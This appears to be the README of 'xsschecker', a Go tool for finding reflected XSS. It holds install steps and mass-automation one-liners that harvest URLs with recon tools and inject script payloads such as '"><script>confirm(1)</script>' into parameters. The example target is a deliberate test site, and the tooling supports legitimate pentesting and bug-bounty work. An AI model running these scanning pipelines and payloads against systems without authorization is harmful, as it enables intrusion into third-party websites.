xsschecker
xsschecker copied to clipboard
rix4uni
xsschecker tool checking reflected endpoints finding possible xss vulnerable endpoints.
_ _ ____ ____ ___ _ _ ____ ___ __ _ ____ ____
( \/ )/ ___)/ ___) / __)/ )( \( __)/ __)( / )( __)( _ \
) ( \___ \\___ \( (__ ) __ ( ) _)( (__ ) ( ) _) ) /
(_/\_)(____/(____/ \___)\_)(_/(____)\___)(__\_)(____)(__\_)
xsschecker tool checking reflected endpoints finding possible xss vulnerable endpoints.
Install
go install github.com/rix4uni/xsschecker@latest
or
git clone https://github.com/rix4uni/xsschecker.git && cd xsschecker && go build xsschecker.go && mv xsschecker /usr/bin/
Usage
go run xsschecker.go -h
Usage: xsschecker [OPTIONS]
Options:
-match string
The string to match against the domain response. (required)
-vuln
If set, only vulnerable URLs will be printed.
Reflected XSS Mass Automation
cat subs.txt | waybackurls >> waybackurls-urls.txt
cat subs.txt | gau >> gau-urls.txt
cat live-subs.txt | hakrawler -scope >> hakrawler-urls.txt
cat waybackurls-urls.txt gau-urls.txt hakrawler-urls.txt | anew -q urls.txt
cat urls.txt | uro | gf allparam | grep "=" | gf blacklist | qsreplace '"><script>confirm(1)</script>' | xsschecker -match '"><script>confirm(1)</script>'
Reflected XSS Oneliner Command1
echo "testphp.vulnweb.com" | waybackurls | gf xss | uro | qsreplace '"><script>confirm(1)</script>' | xsschecker -match '"><script>confirm(1)</script>' -vuln
Reflected XSS Oneliner Command2
echo "testphp.vulnweb.com" | waybackurls | uro | gf allparam | grep "=" | gf blacklist | qsreplace '"><script>confirm(1)</script>' | xsschecker -match '"><script>confirm(1)</script>' -vuln
or
echo "testphp.vulnweb.com" | waybackurls | uro | gf allparam | grep "=" | gf blacklist | qsreplace '"><script>confirm(1)</script>' | xsschecker -match '"><script>confirm(1)</script>, "<image/src/onerror=confirm(1)>' -vuln
rix4uni